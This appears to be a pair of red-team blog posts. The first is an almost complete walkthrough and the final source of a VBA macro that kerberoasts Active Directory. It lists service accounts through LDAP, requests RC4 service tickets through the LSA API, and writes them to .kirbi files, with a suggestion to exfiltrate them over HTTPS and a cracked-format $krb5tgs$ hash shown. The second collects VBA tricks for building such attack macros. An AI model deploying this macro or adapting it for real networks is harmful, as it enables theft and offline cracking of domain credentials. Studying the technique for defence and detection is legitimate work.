        Exit Sub 'Return is only valid after GoSub in VBA
    End If
    With Name
        .Length = Len("Kerberos")
        .MaximumLength = Len("Kerberos") + 1
        .Buffer = "Kerberos"
    End With
    Status = LsaLookupAuthenticationPackage(pLogonHandle, Name, pPackageId)
    If Status <> 0 Then
        MsgBox "Error, LsaLookupAuthenticationPackage failed!"
        Exit Sub
    End If
To retrieve the ticket we need to call LsaCallAuthenticationPackage with a KERB_RETRIEVE_TKT_REQUEST struct as message. This struct is defined as:
typedef struct _KERB_RETRIEVE_TKT_REQUEST {
KERB_PROTOCOL_MESSAGE_TYPE MessageType;
LUID LogonId;
UNICODE_STRING TargetName;
ULONG TicketFlags;
ULONG CacheOptions;
LONG EncryptionType;
SecHandle CredentialsHandle;
} KERB_RETRIEVE_TKT_REQUEST, *PKERB_RETRIEVE_TKT_REQUEST;
Also, we need to define the structure UNICODE_STRING, which is:
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
And SecHandle:
typedef struct _SecHandle {
ULONG_PTR dwLower;
ULONG_PTR dwUpper;
} SecHandle, * PSecHandle;
We can merge KERB_RETRIEVE_TKT_REQUEST and UNICODE_STRING structures to avoid issues, so our structures in VBA will be declared as:
Private Type SecHandle
dwLower As LongPtr
dwUpper As LongPtr
End Type
Private Type KERB_RETRIEVE_TKT_REQUEST
MessageType As KERB_PROTOCOL_MESSAGE_TYPE
LogonIdLower As Long
LogonIdHigher As LongLong
TargetNameLength As Integer
TargetNameMaximumLength As Integer
TargetNameBuffer As LongPtr
TicketFlags As Long
CacheOptions As Long
EncryptionType As Long
CredentialsHandle As SecHandle
End Type
Finally, KERB_PROTOCOL_MESSAGE_TYPE is just an enum:
Private Enum KERB_PROTOCOL_MESSAGE_TYPE
KerbDebugRequestMessage = 0
KerbQueryTicketCacheMessage
KerbChangeMachinePasswordMessage
KerbVerifyPacMessage
KerbRetrieveTicketMessage
KerbUpdateAddressesMessage
KerbPurgeTicketCacheMessage
KerbChangePasswordMessage
KerbRetrieveEncodedTicketMessage
KerbDecryptDataMessage
KerbAddBindingCacheEntryMessage
KerbSetPasswordMessage
KerbSetPasswordExMessage
KerbVerifyCredentialsMessage
KerbQueryTicketCacheExMessage
KerbPurgeTicketCacheExMessage
KerbRefreshSmartcardCredentialsMessage
KerbAddExtraCredentialsMessage
KerbQuerySupplementalCredentialsMessage
KerbTransferCredentialsMessage
KerbQueryTicketCacheEx2Message
End Enum
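A quick way to sanity-check the merged VBA layout against the C definitions is to describe the same structures with Python's ctypes and look at the offsets. This is only a cross-check sketch, assuming a 64-bit process (as with 64-bit Office) and the default C alignment rules. The field types are our mapping of the Windows typedefs quoted above.

```python
import ctypes


class LUID(ctypes.Structure):
    _fields_ = [("LowPart", ctypes.c_uint32), ("HighPart", ctypes.c_int32)]


class UNICODE_STRING(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_void_p)]  # PWSTR


class SecHandle(ctypes.Structure):
    _fields_ = [("dwLower", ctypes.c_size_t),  # ULONG_PTR
                ("dwUpper", ctypes.c_size_t)]


class KERB_RETRIEVE_TKT_REQUEST(ctypes.Structure):
    _fields_ = [("MessageType", ctypes.c_int32),  # enum
                ("LogonId", LUID),
                ("TargetName", UNICODE_STRING),
                ("TicketFlags", ctypes.c_uint32),
                ("CacheOptions", ctypes.c_uint32),
                ("EncryptionType", ctypes.c_int32),
                ("CredentialsHandle", SecHandle)]


def layout():
    """Return each field's byte offset plus the total structure size."""
    offsets = {name: getattr(KERB_RETRIEVE_TKT_REQUEST, name).offset
               for name, _ in KERB_RETRIEVE_TKT_REQUEST._fields_}
    offsets["sizeof"] = ctypes.sizeof(KERB_RETRIEVE_TKT_REQUEST)
    return offsets
```

On a 64-bit interpreter the target name lands at offset 16 and the credentials handle at offset 48, which is the same padding the VBA type obtains by declaring LogonIdHigher as a LongLong.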
Keep in mind that the field defined as TargetNameBuffer is the PWSTR Buffer from UNICODE_STRING, so here we are going to set a pointer to the string that contains the target SPN. The problem is: we do not know where in memory this information will be later, so we are setting this value to something random that will be overwritten with the pointer later on. Other values that we need to set are the encryption (RC4) and the CacheOptions:
'(...)
With KerbRetrieveRequest
.MessageType = KerbRetrieveEncodedTicketMessage
.EncryptionType = 23 'KERB_ETYPE_RC4_HMAC_NT
.CacheOptions = 8 'KERB_RETRIEVE_TICKET_AS_KERB_CRED
.TargetNameLength = LenB(target)
.TargetNameMaximumLength = LenB(target) + 2
.TargetNameBuffer = 1337 'random value, we change it later
End With
'(...)
To work with memory in VBA we use byte arrays. In order to add the target SPN string to the end of our structure, we create an array with the size of the struct, get the pointer to the first element of this array (VarPtr(yourArray(0))), and use this address as the destination of a memory copy (RtlMoveMemory). Then we convert this byte array to a string (StrConv(array, vbUnicode)) and concatenate it with the target SPN. I ended up with this weird method because VBA started to freak out in memory: I don’t like how it is done, but it works.
'Copy the struct to an array and add the string with the target
Dim tmpBuffer() As Byte
Dim Dummy As String
ReDim tmpBuffer(0 To LenB(KerbRetrieveRequest) - 1)
Call CopyMemory(VarPtr(tmpBuffer(0)), VarPtr(KerbRetrieveRequest), LenB(KerbRetrieveRequest)) 'copy the whole struct
Dummy = StrConv(tmpBuffer, vbUnicode)
Dummy = Dummy & StrConv(target, vbUnicode)
At this point we have a string composed of our KERB_RETRIEVE_TKT_REQUEST followed by the string with the SPN, so we need to convert it to an array again and get the memory address where our string is located. Our structure has a size of 64 bytes, so the 65th byte (index 64) is the first byte of our string: we can use VarPtr() again to get this address and set TargetNameBuffer to this pointer later on:
'Get the buffer memory address
Dim fixedAddress As LongPtr
Dim tempToFix() As Byte
tempToFix = StrConv(Dummy, vbFromUnicode)
fixedAddress = VarPtr(tempToFix(64))
In order to call LsaCallAuthenticationPackage, our message buffer must be created in the heap, so we need to allocate memory and copy it:
'Alloc memory from heap and copy the struct
Dim heap As LongPtr
Dim mem As LongPtr
heap = GetProcessHeap()
mem = HeapAlloc(heap, 0, LenB(KerbRetrieveRequest) + LenB(target))
Call CopyMemory(mem, VarPtr(tempToFix(0)), LenB(KerbRetrieveRequest) + LenB(target))
And finally, we can call the function after overwriting the TargetNameBuffer field with the address of the string inside the heap copy:
'Fix the buffer address
fixedAddress = mem + 64
Call CopyMemory(mem + 24, VarPtr(fixedAddress), 8)
'Do the call
Status = LsaCallAuthenticationPackage(pLogonHandle, pPackageId, mem, LenB(KerbRetrieveRequest) + LenB(target), KerbRetrieveResponse, ResponseSize, SubStatus)
If Status <> 0 Then
MsgBox "Error, LsaCallAuthenticationPackage failed!"
End If
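The buffer juggling above boils down to one idea: put the fixed-size request and the SPN string in a single contiguous allocation, and only then write the string's final address into the pointer field. A minimal C sketch of that idea follows; sketch_build_request is a hypothetical helper, the constants 64 and 24 are the struct size and pointer offset quoted in the text, and calloc stands in for HeapAlloc.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

enum {
    SKETCH_REQ_SIZE      = 64,  /* size of the request struct, as stated in the text */
    SKETCH_BUFFER_OFFSET = 24   /* offset of the TargetName buffer pointer */
};

/* Hypothetical helper: returns a zeroed header followed by the UTF-16 SPN,
   with the pointer field patched to the address of the appended string. */
unsigned char *sketch_build_request(const uint16_t *spn, size_t spn_chars, size_t *total_len)
{
    size_t spn_bytes = spn_chars * sizeof(uint16_t);
    unsigned char *mem = calloc(1, SKETCH_REQ_SIZE + spn_bytes);
    if (mem == NULL)
        return NULL;

    /* The string goes right after the fixed-size header. */
    memcpy(mem + SKETCH_REQ_SIZE, spn, spn_bytes);

    /* Patch the pointer last: only now is the final address known. */
    uint64_t fixed = (uint64_t)(uintptr_t)(mem + SKETCH_REQ_SIZE);
    memcpy(mem + SKETCH_BUFFER_OFFSET, &fixed, sizeof fixed);

    *total_len = SKETCH_REQ_SIZE + spn_bytes;
    return mem;
}
```

Patching after the copy is the important part: any pointer taken before the data reaches its final location refers to the wrong buffer.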
If everything went smoothly, we now have a buffer (KerbRetrieveResponse) that is a KERB_RETRIEVE_TKT_RESPONSE structure:
typedef struct _KERB_RETRIEVE_TKT_RESPONSE {
KERB_EXTERNAL_TICKET Ticket;
} KERB_RETRIEVE_TKT_RESPONSE, *PKERB_RETRIEVE_TKT_RESPONSE;
And KERB_EXTERNAL_TICKET is defined as:
typedef struct _KERB_EXTERNAL_TICKET {
PKERB_EXTERNAL_NAME ServiceName;
PKERB_EXTERNAL_NAME TargetName;
PKERB_EXTERNAL_NAME ClientName;
UNICODE_STRING DomainName;
UNICODE_STRING TargetDomainName;
UNICODE_STRING AltTargetDomainName;
KERB_CRYPTO_KEY SessionKey;
ULONG TicketFlags;
ULONG Flags;
LARGE_INTEGER KeyExpirationTime;
LARGE_INTEGER StartTime;
LARGE_INTEGER EndTime;
LARGE_INTEGER RenewUntil;
LARGE_INTEGER TimeSkew;
ULONG EncodedTicketSize;
PUCHAR EncodedTicket;
} KERB_EXTERNAL_TICKET, *PKERB_EXTERNAL_TICKET;
If we use API Monitor to check this buffer in memory we get something like:
I highlighted a few pointers in green (the first pointers correspond to ServiceName, TargetName, ClientName, etc.) and the value of EncodedTicketSize in orange. After EncodedTicketSize comes the pointer (again in green) to the EncodedTicket. So to get our TGS ticket in KiRBi format (as Mimikatz does, for example) we need to extract the pointer to the encoded ticket (at offset 144) and read EncodedTicketSize bytes from it (this value is at offset 136):
'Ticket->EncodedTicketSize
Dim ticketSize As Long 'EncodedTicketSize is a 4-byte ULONG
Call CopyMemory(VarPtr(ticketSize), VarPtr(Response(136)), 4)
'Ticket->EncodedTicket (address)
Dim encodedTicketAddress As LongPtr
Call CopyMemory(VarPtr(encodedTicketAddress), VarPtr(Response(144)), 8)
'Ticket->EncodedTicket (value)
Dim encodedTicket() As Byte
ReDim encodedTicket(0 To ticketSize - 1) 'exactly ticketSize bytes
Call CopyMemory(VarPtr(encodedTicket(0)), encodedTicketAddress, ticketSize)
'Save it
Dim fileName As String
fileName = Replace(target, "/", "_")
fileName = Replace(fileName, ":", "_")
MsgBox fileName
Open fileName & ".kirbi" For Binary Access Write As #1
lWritePos = 1
Put #1, lWritePos, encodedTicket
Close #1
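The offsets 136 and 144 used above can be verified the same way as the request layout. The sketch below mirrors KERB_EXTERNAL_TICKET for a 64-bit target with fixed-width integers. The sketch_ names are hypothetical, pointers are modelled as uint64_t, and the three-field KERB_CRYPTO_KEY layout is not shown in this article, so treat it as an assumption to check against your SDK headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct { uint16_t Length; uint16_t MaximumLength; uint64_t Buffer; } sketch_ustr;
/* Assumed layout: key type, key length, pointer to the key bytes. */
typedef struct { int32_t KeyType; uint32_t Length; uint64_t Value; } sketch_crypto_key;

typedef struct {
    uint64_t          ServiceName, TargetName, ClientName;   /* pointers */
    sketch_ustr       DomainName, TargetDomainName, AltTargetDomainName;
    sketch_crypto_key SessionKey;
    uint32_t          TicketFlags, Flags;
    int64_t           KeyExpirationTime, StartTime, EndTime, RenewUntil, TimeSkew;
    uint32_t          EncodedTicketSize;
    uint64_t          EncodedTicket;                         /* pointer */
} sketch_external_ticket;

static_assert(offsetof(sketch_external_ticket, EncodedTicketSize) == 136, "size offset");
static_assert(offsetof(sketch_external_ticket, EncodedTicket) == 144, "pointer offset");

/* Read the 4-byte ticket size out of a raw copy of the response. */
uint32_t sketch_ticket_size(const unsigned char *response)
{
    uint32_t size;
    memcpy(&size, response + 136, sizeof size);
    return size;
}

/* Read the 8-byte pointer to the encoded ticket out of the same copy. */
uint64_t sketch_ticket_address(const unsigned char *response)
{
    uint64_t address;
    memcpy(&address, response + 144, sizeof address);
    return address;
}
```

Note that the size field is 4 bytes wide while the pointer is 8, which is why the two CopyMemory calls use different lengths.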
Of course, instead of saving the tickets to disk, we should exfiltrate them via HTTPS or any other method. Then we can convert the KiRBi ticket into a Hashcat-friendly format using the kirbi2hashcat.py script:
mothra@arcadia:/tmp|⇒ python kirbi2hashcat.py test.kirbi
$krb5tgs$23$2c4b4631e22d9e82823810dd51b11e17$1c1c0be320175b6486644311922fed8e3ee5a900112edbabe50b11d1a9b1f4609d30499616a8beb93071914f3eeade1e582878a1ad8c5574fbbc689569797aba9039da9f04ba3d91c3f12a307455d25e221fff21807d9d8d7e75492290be4922cf027e01aeae3e74eda64f6a258445b7547db94e9b5a153746a81b46d5b9a9d1c15794fb3cd6c488ac437ccb6a2612edcda95a2474854c73413024363c7dc40f3938b6ea988e246847fab0ed19433617870c05555dcee9b335f34774098f66a022437b75e22a787c9285276cd68a173f12fa0fbb2c41dafbf30e960f7404daee3b33d188a567e89f381e54936dfae1e3da74c6c50315308fa5dcb5af4e1e1ac9b2df5385cd8755365675c3aa8126ad62b24d5738c7ab665529c36aa09edc8a9935949142ccb75ade84596cf973700590d51e449eafb86a7b5149b89cb1232ac7823145c857d0762cbaf9c8a175e0783becd0c3f12dbf1ce02bca6d18e0d6a42949f5ac9a2442a94b1176ad3da71884be36da506c5e0aa2faf503c2ac5197b75ab1bce9f55abfbb8b374cfeacebac5a3d4ce3d01c23ce62312d5906846ea0b47d74b740dd5a1eac1451f599c6a0b6827bbe2a434a93646cb6990133392508b4e4650f635ae214b47cc1e7e135bd4d6ceaa188a61abd3dcbb5355a7fb48d6041bb6ff2c19b2a38fd2ec001e49794c61b0162393a94ba33da8d06df500cb39965ace726f542aacf2715f24c3a22e8e82c50f3b36f4ebb168c46f524c2c142521dca1e597e316fbf7ec1b7cb8810e63f39062d8369cf44e4b085bb1c85b7813c771644eaf7dfc7bce47238d77a5254edf5b179a4b34c1e567bb46aea4f965539f4e87425ceb17badcbd079dfc01d2a99270476592c4f4ea2718e3a55f6d8f61688b40669d0a13a3c3937feabc54a11e038e4c5a336273fd4601b5853d1e5df0d9a945cc2dbf2500c6f7bfc3099d386b9d7078b0f5850be93c4e2e220fbee3b19fdf3f9e18148495f409eb1b94fb43898bcdf512e32e4689d6e7414d2e51a8a605e5db0ca79f8dc5b0a34e3969dd5cca607aa0d63bc0146df647ae6126375a7723f1439401f1646f1be6c6cf98c27ab6bf3f3e4d571e8670288be55d11f5530aafff5fdecd108542ea78dfc1427e46761176dc5923418114164502d2981c03e7d3632ebb308d8f5e5ae258a7b545d95d25ba85139de8acafe20814e6074d1ed4528dd0ae8e69bf5dc18248a7ccb111bbcc13fa91d7eae0d5d688121d9fae6a574e0154dedeb3049e5f6c1c458950b3000e3174aec2d750cfc08ac8f29818b504e89feec8e68d2dc82a0211816ebe05c22c990692ba971bda7f4900262701873532c611a49b8e85c7a2fb4ab0ae79ca579e14a4a7
fb3829a730b0e8e19d7e97a1ba05c17f9baafa52ca702e31bb7874cfa0db0af1452185987fbc991e333870268eb3cdf78008570f7f65ae4db99cfc10874f5c5c036af163ffe5ca35231904933b661b482bdcb04a75dcd626b3ce75b257df36b06589cae1ad73539f5de1f88e8b329e0999f56977ad9ef85a5d8dff00c89d121565ae720a3f4b458f84f46418dbe67f06600a600bb33d469cadd61061ca6ee1a6b4e0a011bb74b5c73d4361ebf2391b6fc9bf8a36ae63bb67a6dd5ebabc4d1
Now we have a way to request TGS tickets for SPNs, but how can we get our targets? We can use LDAP queries. I adapted the code from this post to perform a query with the filter (&(samAccountType=805306368)(servicePrincipalName=*)), which matches user accounts that have at least one SPN set.
Our final code is:
Private Declare PtrSafe Function LsaConnectUntrusted Lib "SECUR32" (ByRef LsaHandle As LongPtr) As Long
Private Declare PtrSafe Function LsaLookupAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByRef PackageName As LSA_STRING, ByRef AuthenticationPackage As LongLong) As Long
Private Declare PtrSafe Function LsaCallAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByVal AuthenticationPackage As LongLong, ByVal ProtocolSubmitBuffer As LongPtr, ByVal SubmitBufferLength As Long, ProtocolReturnBuffer As Any, ByRef ReturnBufferLength As Long, ByRef ProtocolStatus As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
Private Declare PtrSafe Function GetProcessHeap Lib "KERNEL32" () As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongLong) As LongPtr
Private Declare PtrSafe Function HeapFree Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, lpMem As Any) As Long
Private Type LSA_STRING
Length As Integer
MaximumLength As Integer
Buffer As String
End Type
Private Enum KERB_PROTOCOL_MESSAGE_TYPE
KerbDebugRequestMessage = 0
KerbQueryTicketCacheMessage
KerbChangeMachinePasswordMessage
KerbVerifyPacMessage
KerbRetrieveTicketMessage
KerbUpdateAddressesMessage
KerbPurgeTicketCacheMessage
KerbChangePasswordMessage
KerbRetrieveEncodedTicketMessage
KerbDecryptDataMessage
KerbAddBindingCacheEntryMessage
KerbSetPasswordMessage
KerbSetPasswordExMessage
KerbVerifyCredentialsMessage
KerbQueryTicketCacheExMessage
KerbPurgeTicketCacheExMessage
KerbRefreshSmartcardCredentialsMessage
KerbAddExtraCredentialsMessage
KerbQuerySupplementalCredentialsMessage
KerbTransferCredentialsMessage
KerbQueryTicketCacheEx2Message
End Enum
Private Type SecHandle
dwLower As LongPtr
dwUpper As LongPtr
End Type
Private Type KERB_RETRIEVE_TKT_REQUEST
MessageType As KERB_PROTOCOL_MESSAGE_TYPE
LogonIdLower As Long
LogonIdHigher As LongLong
TargetNameLength As Integer
TargetNameMaximumLength As Integer
TargetNameBuffer As LongPtr
TicketFlags As Long
CacheOptions As Long
EncryptionType As Long
CredentialsHandle As SecHandle
End Type
Sub askTGS(target As String)
Dim Status As Long
Dim SubStatus As Long
Dim pLogonHandle As LongPtr
Dim Name As LSA_STRING
Dim pPackageId As LongLong
Dim KerbRetrieveRequest As KERB_RETRIEVE_TKT_REQUEST
Dim KerbRetrieveResponse As LongPtr
Dim ResponseSize As Long
Status = LsaConnectUntrusted(pLogonHandle)
If Status <> 0 Then
MsgBox "Error, LsaConnectUntrusted failed!"
Exit Sub
End If
With Name
.Length = Len("Kerberos")
.MaximumLength = Len("Kerberos") + 1
.Buffer = "Kerberos"
End With
Status = LsaLookupAuthenticationPackage(pLogonHandle, Name, pPackageId)
If Status <> 0 Then
MsgBox "Error, LsaLookupAuthenticationPackage failed!"
Exit Sub
End If
With KerbRetrieveRequest
.MessageType = KerbRetrieveEncodedTicketMessage
.EncryptionType = 23 'KERB_ETYPE_RC4_HMAC_NT
.CacheOptions = 8 'KERB_RETRIEVE_TICKET_AS_KERB_CRED
.TargetNameLength = LenB(target)
.TargetNameMaximumLength = LenB(target) + 2
.TargetNameBuffer = 1337 'random value, we change it later
End With
'Copy the struct to an array and add the string with the target
Dim tmpBuffer() As Byte
Dim Dummy As String
ReDim tmpBuffer(0 To LenB(KerbRetrieveRequest) - 1)
Call CopyMemory(VarPtr(tmpBuffer(0)), VarPtr(KerbRetrieveRequest), LenB(KerbRetrieveRequest)) 'copy the whole struct
Dummy = StrConv(tmpBuffer, vbUnicode)
Dummy = Dummy & StrConv(target, vbUnicode)
'Get the buffer memory address
Dim fixedAddress As LongPtr
Dim tempToFix() As Byte
tempToFix = StrConv(Dummy, vbFromUnicode)
fixedAddress = VarPtr(tempToFix(64))
'Alloc memory from heap and copy the struct
Dim heap As LongPtr
Dim mem As LongPtr
heap = GetProcessHeap()
mem = HeapAlloc(heap, 0, LenB(KerbRetrieveRequest) + LenB(target))
Call CopyMemory(mem, VarPtr(tempToFix(0)), LenB(KerbRetrieveRequest) + LenB(target))
'Fix the buffer address
fixedAddress = mem + 64
Call CopyMemory(mem + 24, VarPtr(fixedAddress), 8)
'Do the call
Status = LsaCallAuthenticationPackage(pLogonHandle, pPackageId, mem, LenB(KerbRetrieveRequest) + LenB(target), KerbRetrieveResponse, ResponseSize, SubStatus)
If Status <> 0 Then
MsgBox "Error, LsaCallAuthenticationPackage failed!"
Exit Sub 'the response buffer is not valid, so stop here
End If
'Copy KERB_RETRIEVE_TKT_RESPONSE structure to an array
Dim Response() As Byte
Dim Data As String
ReDim Response(0 To ResponseSize)
Call CopyMemory(VarPtr(Response(0)), KerbRetrieveResponse, ResponseSize)
'Ticket->EncodedTicketSize
Dim ticketSize As Long 'EncodedTicketSize is a 4-byte ULONG
Call CopyMemory(VarPtr(ticketSize), VarPtr(Response(136)), 4)
'Ticket->EncodedTicket (address)
Dim encodedTicketAddress As LongPtr
Call CopyMemory(VarPtr(encodedTicketAddress), VarPtr(Response(144)), 8)
'Ticket->EncodedTicket (value)
Dim encodedTicket() As Byte
ReDim encodedTicket(0 To ticketSize - 1) 'exactly ticketSize bytes
Call CopyMemory(VarPtr(encodedTicket(0)), encodedTicketAddress, ticketSize)
'Save it (change it to send the ticket directly to your endpoint)
Dim fileName As String
fileName = Replace(target, "/", "_")
fileName = Replace(fileName, ":", "_")
MsgBox fileName
Open fileName & ".kirbi" For Binary Access Write As #1
lWritePos = 1
Put #1, lWritePos, encodedTicket
Close #1
End Sub
'Helper
Public Function toStr(pVar_In As Variant) As String
On Error Resume Next
toStr = CStr(pVar_In)
End Function
Sub kerberoast() 'https://www.remkoweijnen.nl/blog/2007/11/01/query-active-directory-from-excel/
'Get the domain string ("dc=domain, dc=local")
Dim strDomain As String
strDomain = GetObject("LDAP://rootDSE").Get("defaultNamingContext")
'ADODB Connection to AD
Dim objConnection As Object
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Open "Provider=ADsDSOObject;"
'Connection
Dim objCommand As ADODB.Command
Set objCommand = CreateObject("ADODB.Command")
objCommand.ActiveConnection = objConnection
'Search the AD recursively, starting at root of the domain
objCommand.CommandText = _
"<LDAP://" & strDomain & ">;(&(samAccountType=805306368)(servicePrincipalName=*));,servicePrincipalName;subtree"
Dim objRecordSet As ADODB.Recordset
Set objRecordSet = objCommand.Execute
Dim i As Long
If objRecordSet.EOF And objRecordSet.BOF Then
Else
Do While Not objRecordSet.EOF
For i = 0 To objRecordSet.Fields.Count - 1
askTGS (toStr(objRecordSet!servicePrincipalName(0)))
Next i
objRecordSet.MoveNext
Loop
End If
'Close connection
objConnection.Close
'Cleanup
Set objRecordSet = Nothing
Set objCommand = Nothing
Set objConnection = Nothing
End Sub
The VBA is dark and full of terrors, so please do not walk this path alone.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about tricks to transcribe well-known attacks and TTPs to the VBA cursed language. Please, take a seat and listen to the story.
There are high chances of invoking daemons from other dimensions while coding tools in the form of VBA macros. Please proceed with caution and always under adult supervision.
As explained in our article Hacking in an epistolary way: implementing kerberoast in pure VBA, we are implementing well-known attacks as VBA macros. This task is extremely frustrating due to restrictions imposed by VBA, which often require workarounds and hacky tricks to address situations that are a nonissue in most other languages. Most of the time we have to google through old forums to find a suitable solution, so we decided to create this article where some of those tricks are collected, so that in 2020 you do not have to waste your time as we did.
Keep in mind that we are focused on implementing the attacks avoiding the usage of process injections, binary drops or PowerShell. We do it calling Windows APIs directly with pure VBA :)
offsetof for the hours saved
One of the most common problems we had to face when creating VBA tools was creating the data structures used by the APIs. VBA types can be a bit tricky, but once you learn their sizes it is easier to mentally translate a C structure to VBA. Except when you have to deal with misalignments. That is a pain in the ass.
Recently, one of our owls created a VBA macro to extract and decrypt passwords saved in Chrome. In the process of creating such a Cronenberg abomination of code, a problem arose: calls to BCryptDecrypt() for the AES-GCM decryption were failing with an “INVALID_PARAMETERS” status. However, checking the call with API Monitor showed no issues, and after a few hours of practicing the ancient sport of hitting a wall with your head, the problem was located: the structure members were misplaced.
This function uses the BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO structure, defined as:
typedef struct _BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO {
ULONG cbSize;
ULONG dwInfoVersion;
PUCHAR pbNonce;
ULONG cbNonce;
PUCHAR pbAuthData;
ULONG cbAuthData;
PUCHAR pbTag;
ULONG cbTag;
PUCHAR pbMacContext;
ULONG cbMacContext;
ULONG cbAAD;
ULONGLONG cbData;
ULONG dwFlags;
} BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, *PBCRYPT_AUTHENTICATED_CIPHER_MODE_INFO;
If you start to blindly translate the structure to VBA, just matching its types, the structure will be misaligned. The easiest way to know where every member should be, so that you can pick the appropriate types (with padding if needed), is to use offsetof:
#include <windows.h>
#include <bcrypt.h>
#include <stddef.h>
#include <stdio.h>
int main()
{
/* offsetof and sizeof yield size_t, so print them with %zu */
printf("cbSize=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbSize));
printf("dwInfoVersion=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, dwInfoVersion));
printf("pbNonce=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbNonce));
printf("cbNonce=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbNonce));
printf("pbAuthData=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbAuthData));
printf("cbAuthData=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbAuthData));
printf("pbTag=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbTag));
printf("cbTag=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbTag));
printf("pbMacContext=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbMacContext));
printf("cbMacContext=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbMacContext));
printf("cbAAD=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbAAD));
printf("cbData=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbData));
printf("dwFlags=%zu\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, dwFlags));
printf("sizeof=%zu\n", sizeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO));
return 0;
}
Which returns the offset of each structure member:
cbSize=0
dwInfoVersion=4
pbNonce=8
cbNonce=16
pbAuthData=24
cbAuthData=32
pbTag=40
cbTag=48
pbMacContext=56
cbMacContext=64
cbAAD=68
cbData=72
dwFlags=80
sizeof=88
Now you can set the types and paddings needed to properly align the structure :)
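To make the gaps visible, here is a sketch that rebuilds the same layout with automatic padding switched off and every filler slot written out by hand. The sketch_ and pad names are hypothetical and pointers are modelled as uint64_t (x64 only); the static assertions simply restate the offsets printed above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#pragma pack(push, 1)   /* no automatic padding: every gap must be spelled out */
typedef struct {
    uint32_t cbSize;
    uint32_t dwInfoVersion;
    uint64_t pbNonce;
    uint32_t cbNonce;
    uint32_t pad0;          /* filler so pbAuthData lands on offset 24 */
    uint64_t pbAuthData;
    uint32_t cbAuthData;
    uint32_t pad1;          /* filler so pbTag lands on offset 40 */
    uint64_t pbTag;
    uint32_t cbTag;
    uint32_t pad2;          /* filler so pbMacContext lands on offset 56 */
    uint64_t pbMacContext;
    uint32_t cbMacContext;
    uint32_t cbAAD;         /* two 4-byte fields in a row need no filler */
    uint64_t cbData;
    uint32_t dwFlags;
    uint32_t pad3;          /* tail filler: total size is a multiple of 8 */
} sketch_cipher_mode_info;
#pragma pack(pop)

static_assert(offsetof(sketch_cipher_mode_info, pbAuthData) == 24, "pbAuthData");
static_assert(offsetof(sketch_cipher_mode_info, pbTag) == 40, "pbTag");
static_assert(offsetof(sketch_cipher_mode_info, pbMacContext) == 56, "pbMacContext");
static_assert(offsetof(sketch_cipher_mode_info, cbData) == 72, "cbData");
static_assert(offsetof(sketch_cipher_mode_info, dwFlags) == 80, "dwFlags");

/* Total size including the tail filler. */
size_t sketch_cipher_mode_info_size(void)
{
    return sizeof(sketch_cipher_mode_info);
}
```

Each pad member marks a spot where a 4-byte field is followed by an 8-byte one, which is exactly where a type-by-type translation is most likely to drift.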
Working with memory is pretty easy once you get used to it. If no fancy stuff is needed, you can just declare an empty byte array (Dim stuff() As Byte) and then resize it as needed using ReDim (ReDim stuff(0 To Size - 1)). In order to copy memory we are going to call RtlMoveMemory, and VarPtr gives us a pointer to an element inside the array. Imagine a function call that returned a pointer to a memory structure from which we want to retrieve a value (let’s say it is at offset 64 with size 16):
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'(...)
dim tmpBuf() as Byte
dim ReturnedPointer as LongPtr
'(...)
ReturnedPointer = something(arg1,arg2)
redim tmpBuf(0 To 15) 'size - 1
Call CopyMemory (VarPtr(tmpBuf(0)), ReturnedPointer + 64, 16)
'(...)
We can also work with the heap in the same way (code reused from the kerberoast post):
Private Declare PtrSafe Function GetProcessHeap Lib "KERNEL32" () As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongLong) As LongPtr
'(...)
Dim heap As LongPtr
Dim mem As LongPtr
heap = GetProcessHeap()
mem = HeapAlloc(heap, 0, LenB(KerbRetrieveRequest) + LenB(target))
Call CopyMemory(mem, VarPtr(tempToFix(0)), LenB(KerbRetrieveRequest) + LenB(target))
'(...)
